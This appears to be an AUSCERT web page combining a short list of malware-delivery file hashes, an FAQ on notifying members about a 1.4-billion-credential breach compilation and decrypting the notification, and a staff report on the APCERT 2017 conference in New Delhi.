370109b73fa9dceea9e2b34b466d0d2560025efcc78616387d84732cbe82b6bd Payload delivery sha256 36524172afa85a131bf0075c7ff20dcbfb8a94c4e981300fb33ef56ed912678c Payload delivery sha256 348c7dd59ea1b4e88585863dd788621f1101202d32df67eb0015761d25946420 Payload delivery sha256 198e090e86863fb5015e380dc159c5634cc2a598e93b20dd9695e1649bb062ad Payload delivery sha256 d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d  

Breach compilation notifications On Tuesday 19th, AUSCERT notified a large number of members whose credentials had been found online. This is a regular service AUSCERT provides, but in this case it is a special event based on a large credential compilation. It contains 1.4 billion credentials. Original source.   FAQ How do I open this file? Suppose the file you’ve received is named me@mydomain.com.zip.asc. This is an encrypted zip file. You will need PGP software to decrypt the file, e.g. GPG. GPG4Win GUI: Open the file in Kleopatra and enter the decryption passphrase. If Kleopatra tells you “error retrieving audit log: decryption failed”, instead open a command prompt and follow the below instructions. GPG command-line: gpg me@mydomain.zip.asc and enter the decryption passphrase. This will create me@mydomain.com.zip. (note no “asc”) Then unzip the file. It contains one or more text files with the credentials we’ve found.   Where do I get the decryption passphrase? Access AUSCERT: Symmetric key decryption details and log in with your member account.   We can’t log in to the member portal. If you know your AUSCERT privileged contact/s in your organisation, please contact them for access. Otherwise, please contact auscert@auscert.org.au to begin regaining access. If you have two-factor authentication set up, recall that this is through a One-Time Password app and not an SMS.   Why does Windows say they’re COM or audio files? Individual files are named by the domain they correspond to. Some files end with ‘.com’, which Windows interprets as a command file, or ‘.au’, which Windows interprets as an audio file. We’ll send files with the ‘.txt’ extension in future. Please open all files in a text editor, such as WordPad or Notepad++.   Where did you get this data? AUSCERT found these credentials in a large collection online, which aggregates other data breaches. It is likely that your users’ credentials were stolen in other breaches such as LinkedIn (for instance, Have I Been Pwned lists famous breaches). Original source.   Have we been breached? It’s hard to say. The majority of the data will have come from attacks on other companies’ databases in the past. Some may be from phishing attacks directly against your users. With a data set this large, individual small attacks can be compiled into what looks like one more substantial attack. It is unlikely, but possible, that your organisation’s database is the source of these credentials. If any of these credentials were reused on internal company systems, and are still active, then there is the potential for them to be abused.   What do we do now? AUSCERT recommends ensuring these credentials are no longer valid within your organisation. Consider contacting users to advise they should change their password anywhere it’s still in use.

APCERT 2017 AGM and Conference: A Window into the CERT community Introduction This year’s APCERT Annual General Meeting and conference has just concluded, being hosted by CERT-In in New Delhi, India. Each year AUSCERT sends a representative to the APCERT conference to collaborate and cooperate with the rest of the APCERT community. This year, I was lucky enough to be selected to attend. APCERT is a community of CERT and CSIRT organisations located in the Asia-Pacific area. Originally formed in 2003, its membership has now grown to 30 organisations representing 21 economies, as well as a number of supporting partner organisations. APCERT’s goals include information sharing and cooperation between its members and the public. Arriving in New Delhi This was my first visit to India, and although I had some knowledge of Indian culture and life, I was amazed to experience it first-hand. I arrived one day before the conference began, and spent the day shopping and taking in the local sights. The bustling streets, chaotic traffic, and the sheer scale of the country are a sight to see, and offer a sharp contrast to the quiet suburban life I am used to back in Brisbane. Delhi itself is a massive city, with a population that rivals that of all of Australia. The conference itself was hosted at the Ashok hotel, in Chanakyapuri, New Delhi. This five-star hotel is located in the heart of a diplomatic and government district, close to many foreign embassies, and as a result is very accommodating to foreign guests. The APCERT Community When the conference registration opened on Sunday morning, I began meeting delegates from other APCERT members. I noticed immediately that everyone was friendly, relaxed, and very welcoming. The APCERT community is small and close-knit, and for some long-time members, the conferences are just as much of a catch-up session as they are a business trip. Apparently some of AUSCERT’s staff are quite famous in the APCERT community, as I received quite a few queries regarding some of my colleagues! All of the APCERT members are working towards the same goal – to protect their economies or industry sectors from new and existing cyber threats. As we are largely government-funded or non-profit organisations, there is no pressure to create profits or sell products, and the focus is entirely on providing the best possible service to our jurisdictions. Some of the teams that participate in APCERT are quite small and do not have the resources to analyse all new threats, so collaboration amongst teams is extremely beneficial. In addition to the welcoming atmosphere among APCERT members, the hospitality and kindness shown by CERT-In was second-to-none. This year was the first time they had hosted the APCERT conference, but the experience was extremely smooth and well-thought out. During the afternoon of the first day, we were taken on a guided tour of local sights by the CERT-In staff, before being presented with a welcome dinner. Having helped run the AUSCERT conference in the past, I know how difficult and stressful it can be to run such an event, and I commend CERT-In on their performance. Conference Proceedings and Talks The conference began with updates from the various working groups within APCERT. This is a great way to share progress with other members, and some of the work presented by teams this year was extremely impressive. One such example is the TSUBAME project, which collects network traffic data from passive “sensors” situated in many networks across the Asia-Pacific region, and compiles that data into statistics that can be used to observe trends in network scans across the internet. Other talks focused on issues such as automated malware analysis, in particular the need for non-commercial options that can be used with potentially sensitive information. A talk given by Wen-Ling Lo from TWCERT/CC brought up an excellent point: many people use services such as VirusTotal or VirScan to check suspicious email attachments, but if the attachment is legitimate and contains confidential information, uploading it to a commercial company’s services could result in an information leak. TWCERT/CC are currently developing a tool that can be used by businesses and governments in Taiwan to examine files without fear that samples will be sent to external or commercial companies. AUSCERT is very impressed with their efforts and will be tracking their progress closely. Not all talks were technical, though, and an unexpectedly impactful presentation by Nurul Husna of MyCERT, the national CERT for Malaysia, described the governance and management workflows required to operate a CERT efficiently. As a technical person, it was refreshing to see a presentation on governance that made sense and showed real value. There is a real need for efficient management of resources at CERTs, due to the quick turnaround time required in order to serve our jurisdictions effectively. Additionally, some external speakers were invited to give talks at the conference. Some highlights included a talk by Akamai representative Amol Mathur on attacks that target API services directly, bypassing many of the protections that are built into front-end applications, and an overview on using machine learning to analyse malware samples by Rajesh Nikam of Quick Heal. As malware campaigns grow in both size and number, we need to move away from manual analysis in order to process as many samples as possible, making use of technologies such as machine learning to automate the process. On the final day of the conference, attendance was opened to external members of the IT industry, and the National Minister for IT & Electronics gave an address to the audience. During the conference I began to see just how large and important the IT industry in India is. With a population of over 1 billion people, internet-based solutions are essential to interacting with the government and businesses, and ensuring these interactions are protected and non-fraudulent is a problem at the forefront of the industry. The conference also served as a focus point for the local government to draw attention to emerging threats, especially as they begin to move towards more digital payment solutions. The full schedule for the APCERT Annual General Meeting and Conference may be found here: https://apcert2017.in/schedule.html The APCERT AGM Another important part of the conference is the Annual General Meeting, or AGM. At the AGM, proposals for changes and amendments to APCERT frameworks and guidelines are put forward and voted upon by members. Proposals for new working groups are also heard, and lastly, the membership of the steering committee and leadership positions are voted upon. This year, CERT-In was accepted as a new member of the steering committee, and after recognising the hard work of JPCERT/CC, MyCERT, and CERT Australia in their positions as Secretariat, Deputy Chair, and Chair respectively, the members of APCERT voted to re-appoint them to their previous positions. AUSCERT would like to thank the steering committee and leadership positions for their hard work in the past year, and congratulate them on their continued appointments. We also welcome CERT-In to the steering committee and look forward to their input in the future! Closing Remarks Attending the APCERT conference and AGM was an eye-opening experience. In the fast-moving world of Information Security, we are facing attacks in greater numbers and greater complexity. It can be difficult to sift through the vast amounts of information distributed throughout the internet, trying to find advice that is truthful, accurate, and relevant to your organisation. CERT and CSIRT organisations offer an increasingly important role in these times, distributing threat intelligence efficiently and with the goal of national/sectorial security in mind. As well, the challenges faced by each CERT are often similar, and there is great value in being able to speak freely with other organisations that share your goals. I would like to thank all of the members, partners, and guests at the conference, for welcoming me to the APCERT community. I’ve made many new friends over the last week, and hearing other analysts describe their experiences, challenges and achievements has re-invigorated my love for information security. I hope AUSCERT can continue to provide value to other APCERT members and look forward to some new collaborations in the future.I would also like to offer a special thank-you to the staff of CERT-In, for being such hospitable hosts. My first stay in India was a great experience, and I hope to return in the future.   Anthony Vaccaroanthony@auscert.org.au